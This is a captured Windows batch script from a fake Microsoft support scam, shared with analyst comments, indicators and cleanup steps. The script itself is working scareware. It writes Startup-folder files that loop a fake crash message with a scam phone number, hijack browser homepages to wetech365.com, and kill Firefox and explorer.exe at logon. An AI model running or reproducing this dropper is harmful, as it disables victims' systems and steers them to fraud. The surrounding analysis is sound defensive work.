Created
August 9, 2017 04:16
Windows batch script uploaded remotely to my Windows 7 virtual machine by a fake "Microsoft" support scammer.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
rem ---------------------------------------------------------------------------
rem Analyst notes. The captured script lines are unchanged.
rem Purpose: scareware dropper. Run once, it writes three files into the
rem directory it changes to, the current user's Startup folder, where files
rem are launched at each logon:
rem   startup1.vbs  endless MSGBOX loop with a fake crash text and phone number
rem   startup1.bat  points browser start pages at one URL and kills Firefox
rem   startup2.bat  force-kills explorer.exe
rem Indicators visible in this sample: the three file names above, the phone
rem number in the MSGBOX text, and hxxp://wetech365[.]com/popup.jpg.
rem Cleanup: delete the three files from the Startup folder, restore the
rem Internet Explorer Start Page value under HKCU, and inspect the Firefox
rem prefs.js for an appended browser.startup.homepage line.
rem NOTE(review): the trailing pipe characters on every line look like residue
rem from the page table layout, not part of the script. Confirm against the
rem raw file before treating them as syntax.
rem ---------------------------------------------------------------------------
@echo off | |
rem Navigate to startup folder | |
rem Legacy XP-style path for the per-user Startup folder. Nothing checks that
rem the cd succeeded, so on failure the files below land in whatever directory
rem the script was started from. Search there as well.
cd "%userprofile%\Start Menu\Programs\Startup" | |
rem Build startup1.vbs one line at a time with append redirection. DO and LOOP
rem with no exit condition re-show the message box each time it is dismissed.
echo DO >> "startup1.vbs" | |
echo MSGBOX "WINDOWS HAS BEEN CRASHED, CALL WINDOWS SUPPORT 844-666-0661 FOR HELP " >> "startup1.vbs" | |
echo LOOP >> "startup1.vbs" | |
@echo off | |
rem Single redirection here creates or truncates startup1.bat. Every later
rem line is appended to it.
echo cd "C:\Windows\System32" > "startup1.bat" | |
rem Navigate to startup folder | |
cd "%userprofile%\Start Menu\Programs\Startup" | |
echo @echo off >> "startup1.bat" | |
echo Go to Begin >> "startup1.bat" | |
echo @echo off >> "startup1.bat" | |
rem Homepage hijack. The three REG ADD lines written below force-set a
rem START PAGE value for the current user, with /F suppressing the prompt.
rem NOTE(review): the Chrome and Firefox key paths sit under SOFTWARE\MICROSOFT
rem and are presumably not read by those browsers. Their presence in the
rem registry is still a usable indicator. TODO confirm.
echo REG ADD "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN" /V "START PAGE" /D "http://wetech365.com/popup.jpg" /F >> "startup1.bat" | |
echo @echo off >> "startup1.bat" | |
echo REG ADD "HKCU\SOFTWARE\MICROSOFT\GOOGLE CHROME\MAIN" /V "START PAGE" /D "http://wetech365.com/popup.jpg" /F >> "startup1.bat" | |
echo @echo off >> "startup1.bat" | |
echo REG ADD "HKCU\SOFTWARE\MICROSOFT\MOZILLA FIREFOX\MAIN" /V "START PAGE" /D "http://wetech365.com/popup.jpg" /F >> "startup1.bat" | |
rem Firefox section. The dropped file force-kills Firefox, then targets the
rem prefs.js of a profile directory matching *.default.
rem The APPDATA, cd, ffile and windir variables on these echo lines are
rem expanded by this outer script while it writes, so startup1.bat ends up
rem holding literal values from the victim session rather than variable names.
echo taskkill /im firefox.exe* /f >> "startup1.bat" | |
echo cd /D "%APPDATA%\Mozilla\Firefox\Profiles" >> "startup1.bat" | |
echo cd *.default >> "startup1.bat" | |
echo set ffile=%cd% >> "startup1.bat" | |
rem NOTE(review): two append redirections on one line. It reads as an attempt
rem to add a homepage user_pref to prefs.js, but which file actually receives
rem the text depends on how cmd resolves them. Verify in a sandbox.
echo echo user_pref("browser.startup.homepage", "http://wetech365.com/popup.jpg");>>"%ffile%\prefs.js" >> "startup1.bat" | |
echo set ffile= >> "startup1.bat" | |
echo cd %windir% >> "startup1.bat" | |
rem Writes a javascript URL as a plain text line of startup1.bat.
echo javascript:(function(){ window.location.href='http://wetech365.com/popup.jpg';})(); >> "startup1.bat" | |
rem Second dropped file. At logon it force-kills explorer.exe, the process
rem named on the line below.
echo taskkill /f /IM explorer.exe >> "startup2.bat" | |